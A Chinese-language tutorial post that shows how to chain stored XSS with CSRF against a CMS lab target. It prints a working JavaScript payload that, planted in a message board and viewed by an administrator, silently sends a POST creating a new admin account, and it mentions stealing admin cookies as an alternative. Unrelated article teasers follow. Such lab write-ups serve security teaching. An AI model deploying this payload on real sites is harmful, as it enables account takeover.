XSS+CSRF组合拳

目录

简介

如何进行实战

进入后台创建一个新用户进行接口分析

构造注入代码

寻找XSS漏洞并注入

小结


简介

(案例中将使用cms靶场来进行演示)

在实战中CSRF利用条件十分苛刻,因为我们需要让受害者点击我们的恶意请求不是一件容易的事情 。所以单单一个CSRF漏洞危害是很小的,所以我们为了扩大危害,就需要借助XSS漏洞与之配合 。我们利用XSS漏洞让受害者执行JS代码,JS代码有发起请求的功能,借此功能我们配合CSRF漏洞达成我们的攻击。我们利用XSS执行JS代码的时候发起我们构造的恶意请求,从而能达到让受害者无感知地受到攻击。

如何通过js发起请求,具体来说有以下步骤

  1. 创建 XMLHttpRequest 实例

  2. 发出 HTTP 请求

  3. 接收服务器传回的数据

  4. 更新网页数据

如何进行实战

  1. 分析功能点的请求接口,构造恶意请求(创建网站后台管理员账密)

  2. 编写发起恶意请求的恶意JS

  3. 寻找XSS漏洞

  4. 使用恶意的JS进行XSS攻击 

进入后台创建一个新用户进行接口分析

构造注入代码

根据刚刚抓到的包构造创建一个新管理员的代码

<script>
xmlhttp = new XMLHttpRequest();
xmlhttp.open("post","添加管理员的页面",false);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("act=add&username=test&password=123456&password2=123456&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0");
</script>

寻找XSS漏洞并注入

载我安装的cms中发现有留言板尝试注入,将刚刚编写好的注入代码插入到输入框,留言页面的输入框都可以尝试注入

留言成功

 现在我们到后台模拟管理员审核

(现在是没有管理员的)

 管理员查看留言

现在再看管理员界面发现多了一个管理员正是我们模拟创建的管理员

小结

你的xss漏洞打到网站后台,并不一定要添加管理员,你也可以抓取管理员的cookie。本次攻击的最大工臣还是xss漏洞,没有xss漏洞这次攻击是无从谈起的。

这个漏洞在如今已经已经几乎不存在了,因为csrf很好防御。


不嫌弃的点点关注,点点赞 ଘ(੭ˊᵕˋ)੭* ੈ✩‧₊˚

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/856274.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

商业银行数据资产管理体系建设的实践与展望

随着数字经济的快速发展&#xff0c;数据已成为商业银行的核心资产。商业银行在数字化转型过程中&#xff0c;面临如何有效管理和利用海量数据资产的挑战。本文基于《商业银行数据资产管理体系建设实践报告》&#xff0c;探讨浦发银行、IBM和中国信息通信研究院在数据资产管理体…

DVWA - Brute Force

DVWA - Brute Force 等级&#xff1a;low ​ 直接上bp弱口令爆破&#xff0c;设置变量&#xff0c;攻击类型最后一个&#xff0c;payload为用户名、密码简单列表 ​ 直接run&#xff0c;长度排序下&#xff0c;不一样的就是正确的用户名和密码 ​ 另解&#xff1a; 看一下…

NSSCTF-Web题目8

目录 [LitCTF 2023]Http pro max plus 1、题目 2、知识点 3、思路 [NSSCTF 2022 Spring Recruit]babyphp 1、题目 2、知识点 3、思路 [LitCTF 2023]Http pro max plus 1、题目 2、知识点 http数据包头部字段 3、思路 打开题目 第一想法就是加上X-forwarded-for字段 …

一分钟搭建新生录取查询系统

小伙伴们&#xff0c;新学期就要开始了&#xff0c;招生老师们&#xff0c;你们准备好迎接新生了吗&#xff1f;我给老师们分享一个超级实用的小技巧——如何用快速搭建一个新生录取查询系统&#xff01; 准备好录取名单的电子表格&#xff0c;记得包含“姓名”和“手机号”这样…

【LeetCode 5.】 最长回文子串

一道题能否使用动态规划就在于判断最优结构是否是通过最优子结构推导得到&#xff1f;如果显然具备这个特性&#xff0c;那么就应该朝动态规划思考。如果令dp[i][j]表示串s[i:j1]是否是回文子串&#xff0c;那么判断dp[i][j] 是否是回文子串&#xff0c;相当于判断s[i] 与 s[j]…

AI企业盈利与成本问题

一、AI技术成本超预期&#xff0c;初创公司财务压力凸显 近期&#xff0c;AI领域的一些初创公司正面临财务压力&#xff0c;外媒记者亚伦费尔南德斯认为这可能标志着AI热潮时期即将结束。自3月中旬以来&#xff0c;包括Inflection AI、Stability AI和Anthropic在内的几家公司均…

函数指针的使用是否必须需要加符号?

在C或C等编程语言中&#xff0c;函数指针是一种特殊的指针类型&#xff0c;它用来指向一个函数。使用函数指针时&#xff0c;通常不需要在函数名后面加 & 符号。函数指针的声明和使用通常遵循以下规则&#xff1a; 1.声明函数指针&#xff1a;声明一个函数指针时&#xff…

Python中的TXT文档处理:导出与读取

Python中的TXT文档处理&#xff1a;导出与读取 在数据处理和分析中&#xff0c;文本文件&#xff08;尤其是TXT和CSV格式&#xff09;经常被用作数据交换的标准格式。本文将详细探讨如何在Python中处理TXT文件&#xff0c;包括如何导出和读取TXT文档&#xff0c;以及与CSV格式…

可视化大屏:选了浅色系,结果悲剧了

某些时候&#xff0c;有些客户不听劝告&#xff0c;感觉深色系大屏过于压抑&#xff0c;就让用浅色系&#xff0c;结果浅色系投到大屏上&#xff0c;直接亮瞎了。 选择浅色系的可视化大屏可能会存在以下几个问题&#xff1a; 视觉疲劳&#xff1a; 浅色系的颜色相对较亮&…

MySQL的引擎InnoDB和MyISAM有什么区别

一、典型回答 InnoDB和MyISAM是MySQL中比较常用的两个执行引擎&#xff0c;MySQL在5.5之前版本默认存储引擎是MyISAM&#xff0c;5.5之后版本默认存储引擎是InnoDB&#xff0c;MyISAM适合查询以及插入为主的应用&#xff0c;InnoDB适合频繁修改以及涉及安全性较高的应用。 如果…

极限编程里最容易被忽略的实践

在前面的一篇文章里面我和大家聊过了极限编程的重要性&#xff0c;今天想和大家聊聊极限编程里面最简单但也往往最容易被忽略的实践——编码规范。 说到编码规范&#xff0c;每一个开发人员都非常熟悉&#xff0c;每一个团队也都有自己的编码规范。但实际的执行情况如何呢&…

深圳信用贷款之路:申请了10次都被拒!这三步帮你逆袭银行贷款!

贷款客户最头疼的就是明明查询了一堆资料&#xff0c;贷款还是办不下来&#xff01;尤其是那些负债累累的&#xff0c;急需资金还月供和本金的朋友们&#xff0c;不是在贷款就是在贷款的路上&#xff0c;一个月申请了10次都被拒&#xff01;去了好几家贷款机构&#xff0c;费用…

数据库开发-MySQL

前言 首先来了解一下什么是数据库。 数据库&#xff1a;英文为 DataBase&#xff0c;简称DB&#xff0c;它是存储和管理数据的仓库。 像我们日常访问的电商网站京东&#xff0c;企业内部的管理系统OA、ERP、CRM这类的系统&#xff0c;以及大家每天都会刷的头条、抖音类的app…

中科院推出的三大免费神器,值得焊死在你的电脑上!

紫东太初&#xff1a;强大的中文预训练语言模型平台 紫东太初是中科院推出的中文预训练语言模型平台&#xff0c;具备强大的自然语言处理能力&#xff0c;支持文本生成、分类和摘要等多种任务。 核心功能 文本生成&#xff1a;通过输入关键词或短语&#xff0c;生成相关的文…

文字游侠:一款全新AI写作模型,每天10分钟一键创作爆文!附渠道和玩法教程!

在当今快节奏的社会中&#xff0c;虽然传统的工作可以满足我们基本的物质需求&#xff0c;但许多人内心深处渴望的是更高层次的精神满足。这就像是我们常说的&#xff1a;“工资可以喂饱肚子&#xff0c;副业可以养活灵魂。”这并不是鼓励大家辞去日常工作&#xff0c;而是提倡…

美国铁路客运巨头Amtrak泄漏旅客数据,数据销毁 硬盘销毁 文件销毁

旅客的Guest Rewards常旅客积分账户的个人信息被大量窃取。 美国国家客运铁路公司&#xff08;Amtrak&#xff09;近日披露了一起数据泄露事件&#xff0c;旅客的Guest Rewards常旅客积分账户的个人信息被大量窃取。 根据Amtrak向马萨诸塞州提交的泄露通知&#xff0c;5月15日…

.net 6 api 修改URL为小写

我们创建的api项目&#xff0c;url是[Route(“[controller]”)]&#xff0c;类似这样子定义的。我们的controller命名是大写字母开头的&#xff0c;显示在url很明显不是很好看&#xff08;url不区分大小写&#xff09;。转换方式&#xff1a; var builder WebApplication.Crea…

Simufact Additive仿真助力金属粘结剂喷射成型(MBJ)工业化

引 言 烧结过程中“设计”补偿变形的能力被视为是实现金属粘结剂喷射成型&#xff08;MBJ&#xff09;快速商业化的关键。针对烧结过程的仿真分析&#xff0c;Simufact Additive软件现已推出了MBJ仿真模块第三个版本&#xff0c;当前版本能够准确模拟烧结过程&#xff0c;预测…

Adb - No devices and/or emulators connected.

这条消息是在你尝试使用ADB&#xff08;Android Debug Bridge&#xff09;与Android设备或模拟器进行交互时出现的&#xff0c;但系统没有找到任何连接的设备或模拟器。ADB是Android SDK中的一个工具&#xff0c;它允许你与设备进行通信&#xff0c;以执行各种设备操作&#xf…

elementPlus渲染需要权限校验的图片

技术栈&#xff1a;elementPlusvue3 html部分&#xff1a; <el-image :style"{width:width,height:height}" ref"previewimg" :src"previewSrc"></el-image> js部分 /*** 预览图片* param {String} url [图片的地址]*/const showP…